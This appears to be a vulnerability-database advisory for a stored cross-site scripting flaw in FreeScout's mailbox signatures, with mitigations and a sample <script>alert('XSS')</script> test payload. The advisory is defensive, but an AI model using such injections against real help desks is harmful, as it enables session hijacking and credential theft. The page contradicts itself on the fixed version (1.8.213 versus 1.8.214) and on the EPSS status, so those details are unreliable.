Platform
php
Component
freescout-help-desk
Fixed in
1.8.214
CVE-2026-40568 describes a stored cross-site scripting (XSS) vulnerability discovered in FreeScout, a free self-hosted help desk and shared mailbox application. This vulnerability allows attackers to inject malicious scripts into mailbox signatures, potentially leading to account compromise and data theft. The issue affects versions 1.0.0 through 1.8.212, and a patch is available in version 1.8.213.
The XSS vulnerability in FreeScout arises from insufficient sanitization of HTML tags within the mailbox signature feature. The Helper::stripDangerousTags() function employs a limited blocklist, failing to remove event handler attributes and allowing the injection of potentially harmful HTML elements like <img>, <svg>, and <details>. A successful exploit could enable an attacker to execute arbitrary JavaScript code in the context of a victim's browser. This could lead to session hijacking, credential theft, redirection to malicious websites, or defacement of the FreeScout interface. The impact is particularly severe because mailbox signatures are often displayed in email communications, potentially affecting recipients beyond the FreeScout user.
CVE-2026-40568 was publicly disclosed on 2026-04-21. Currently, there are no publicly available proof-of-concept exploits. The EPSS score is pending evaluation. Given the ease of XSS exploitation and the potential for widespread impact, this vulnerability warrants prompt attention and remediation.
Exploit Status
EPSS
0.03% (10% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-40568 is to immediately upgrade FreeScout to version 1.8.213 or later, which includes the necessary sanitization improvements. If upgrading is not immediately feasible, consider implementing a Web Application Firewall (WAF) rule to filter potentially malicious HTML tags and event handlers within mailbox signature submissions. Additionally, review and restrict user permissions related to mailbox signature management to limit the potential attack surface. Monitor FreeScout logs for suspicious activity, such as unusual HTML content in mailbox signatures. After upgrading, verify the fix by attempting to inject a simple XSS payload (e.g., <script>alert('XSS')</script>) into a mailbox signature and confirming that it is properly sanitized.
Update FreeScout to version 1.8.213 or higher to mitigate the XSS vulnerability. This version fixes the HTML sanitization in mailbox signatures, removing dangerous event handler attributes and ensuring that only safe HTML tags are allowed.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-40568 is a stored cross-site scripting (XSS) vulnerability in FreeScout versions 1.0.0 through 1.8.212, allowing attackers to inject malicious scripts via mailbox signatures.
You are affected if you are running FreeScout versions 1.0.0 through 1.8.212. Verify your version and upgrade immediately if vulnerable.
Upgrade FreeScout to version 1.8.213 or later to resolve the vulnerability. Consider WAF rules as a temporary mitigation.
As of the current disclosure date, there are no confirmed reports of active exploitation, but the vulnerability's ease of exploitation warrants caution.
Refer to the FreeScout security advisory on their official website or GitHub repository for detailed information and updates.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.